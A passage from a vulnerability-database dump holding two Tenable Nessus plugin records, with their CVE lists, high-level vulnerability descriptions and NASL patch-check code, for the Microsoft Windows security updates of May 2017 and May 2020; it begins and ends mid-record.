exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 8.1 and Windows Server 2012 R2 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0228", "CVE-2017-0231", "CVE-2017-0238", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019215.NASL", "href": "https://www.tenable.com/plugins/nessus/100057", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100057);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0190\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0228\",\n \"CVE-2017-0231\",\n \"CVE-2017-0238\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019215\");\n script_xref(name:\"MSKB\", value:\"4019213\");\n script_xref(name:\"MSFT\", value:\"MS17-4019215\");\n script_xref(name:\"MSFT\", value:\"MS17-4019213\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019213\nor cumulative update 4019215. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019215/windows-8-update-kb4019215\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?09cc032f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019213 or Cumulative update KB4019215.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019213', # 8.1 / 2012 R2 Security Only\n '4019215' # 8.1 / 2012 R2 Monthly Rollup\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Windows 8.1 / Windows Server 2012 R2\nif ( smb_check_rollup(os:\"6.3\", sp:0, rollup_date: \"05_2017\", bulletin:bulletin, rollup_kb_list:[4019213, 4019215]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T15:54:09", "description": "The remote Windows host is missing security update 4556843 or cumulative update 4556836. It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists when .NET Core or .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core or .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Core or .NET Framework application. The update addresses the vulnerability by correcting how the .NET Core or .NET Framework web application handles web requests. (CVE-2020-1108)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-1141)\n\n - A denial of service vulnerability exists when Hyper-V on a Windows Server fails to properly handle specially crafted network packets. (CVE-2020-0909)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1072)\n\n - An information disclosure vulnerability exists when the Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1116)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1048, CVE-2020-1070)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1051, CVE-2020-1174, CVE-2020-1175, CVE-2020-1176)\n\n - An elevation of privilege vulnerability exists in Windows Block Level Backup Engine Service (wbengine) that allows file deletion in arbitrary locations.\n (CVE-2020-1010)\n\n - An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. (CVE-2020-1066)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0963, CVE-2020-1179)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1062, CVE-2020-1092)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1078)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1064)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1153)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1054, CVE-2020-1143)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1150)\n\n - A remote code execution vulnerability exists in the way that Windows handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code with elevated permissions on a target system. (CVE-2020-1067)\n\n - A security feature bypass vulnerability exists in Microsoft Windows when the Task Scheduler service fails to properly verify client connections over RPC. An attacker who successfully exploited this vulnerability could run arbitrary code as an administrator. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1113)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1112)\n\n - An elevation of privilege vulnerability exists when the Windows Printer Service improperly validates file paths while loading printer drivers. An authenticated attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges.\n (CVE-2020-1081)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Script Runtime handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1061)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles errors tied to Remote Access Common Dialog. An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges. (CVE-2020-1071)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1114)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1154)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1035, CVE-2020-1058, CVE-2020-1060, CVE-2020-1093)", "cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-05-12T00:00:00", "type": "nessus", "title": "KB4556843: Windows 7 and Windows Server 2008 R2 May 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0909", "CVE-2020-0963", "CVE-2020-1010", "CVE-2020-1035", "CVE-2020-1048", "CVE-2020-1051", "CVE-2020-1054", "CVE-2020-1058", "CVE-2020-1060", "CVE-2020-1061", "CVE-2020-1062", "CVE-2020-1064", "CVE-2020-1066", "CVE-2020-1067", "CVE-2020-1070", "CVE-2020-1071", "CVE-2020-1072", "CVE-2020-1078", "CVE-2020-1081", "CVE-2020-1092", "CVE-2020-1093", "CVE-2020-1108", "CVE-2020-1112", "CVE-2020-1113", "CVE-2020-1114", "CVE-2020-1116", "CVE-2020-1141", "CVE-2020-1143", "CVE-2020-1150", "CVE-2020-1153", "CVE-2020-1154", "CVE-2020-1174", "CVE-2020-1175", "CVE-2020-1176", "CVE-2020-1179"], "modified": "2022-05-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAY_4556836.NASL", "href": "https://www.tenable.com/plugins/nessus/136507", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136507);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\n \"CVE-2020-0909\",\n \"CVE-2020-0963\",\n \"CVE-2020-1010\",\n \"CVE-2020-1035\",\n \"CVE-2020-1048\",\n \"CVE-2020-1051\",\n \"CVE-2020-1054\",\n \"CVE-2020-1058\",\n \"CVE-2020-1060\",\n \"CVE-2020-1061\",\n \"CVE-2020-1062\",\n \"CVE-2020-1064\",\n \"CVE-2020-1066\",\n \"CVE-2020-1067\",\n \"CVE-2020-1070\",\n \"CVE-2020-1071\",\n \"CVE-2020-1072\",\n \"CVE-2020-1078\",\n \"CVE-2020-1081\",\n \"CVE-2020-1092\",\n \"CVE-2020-1093\",\n \"CVE-2020-1108\",\n \"CVE-2020-1112\",\n \"CVE-2020-1113\",\n \"CVE-2020-1114\",\n \"CVE-2020-1116\",\n \"CVE-2020-1141\",\n \"CVE-2020-1143\",\n \"CVE-2020-1150\",\n \"CVE-2020-1153\",\n \"CVE-2020-1154\",\n \"CVE-2020-1174\",\n \"CVE-2020-1175\",\n \"CVE-2020-1176\",\n \"CVE-2020-1179\"\n );\n script_xref(name:\"MSKB\", value:\"4556836\");\n script_xref(name:\"MSKB\", value:\"4556843\");\n script_xref(name:\"MSFT\", value:\"MS20-4556836\");\n script_xref(name:\"MSFT\", value:\"MS20-4556843\");\n script_xref(name:\"IAVA\", value:\"2020-A-0213-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4556843: Windows 7 and Windows Server 2008 R2 May 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4556843\nor cumulative update 4556836. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A denial of service vulnerability exists when .NET Core\n or .NET Framework improperly handles web requests. An\n attacker who successfully exploited this vulnerability\n could cause a denial of service against a .NET Core or\n .NET Framework web application. The vulnerability can be\n exploited remotely, without authentication. A remote\n unauthenticated attacker could exploit this\n vulnerability by issuing specially crafted requests to\n the .NET Core or .NET Framework application. The update\n addresses the vulnerability by correcting how the .NET\n Core or .NET Framework web application handles web\n requests. (CVE-2020-1108)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-1141)\n\n - A denial of service vulnerability exists when Hyper-V on\n a Windows Server fails to properly handle specially\n crafted network packets. (CVE-2020-0909)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1072)\n\n - An information disclosure vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1116)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1048, CVE-2020-1070)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1051, CVE-2020-1174, CVE-2020-1175,\n CVE-2020-1176)\n\n - An elevation of privilege vulnerability exists in\n Windows Block Level Backup Engine Service (wbengine)\n that allows file deletion in arbitrary locations.\n (CVE-2020-1010)\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2020-1066)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0963, CVE-2020-1179)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1062,\n CVE-2020-1092)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1078)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1064)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1153)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1054, CVE-2020-1143)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1150)\n\n - A remote code execution vulnerability exists in the way\n that Windows handles objects in memory. An attacker who\n successfully exploited the vulnerability could execute\n arbitrary code with elevated permissions on a target\n system. (CVE-2020-1067)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when the Task Scheduler service fails\n to properly verify client connections over RPC. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code as an administrator. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1113)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1112)\n\n - An elevation of privilege vulnerability exists when the\n Windows Printer Service improperly validates file paths\n while loading printer drivers. An authenticated attacker\n who successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges.\n (CVE-2020-1081)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Script Runtime handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1061)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles errors tied to Remote Access\n Common Dialog. An attacker who successfully exploited\n the vulnerability could run arbitrary code with elevated\n privileges. (CVE-2020-1071)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1114)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-1154)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1035, CVE-2020-1058,\n CVE-2020-1060, CVE-2020-1093)\");\n # https://support.microsoft.com/en-us/help/4556836/windows-7-update-kb4556836\n 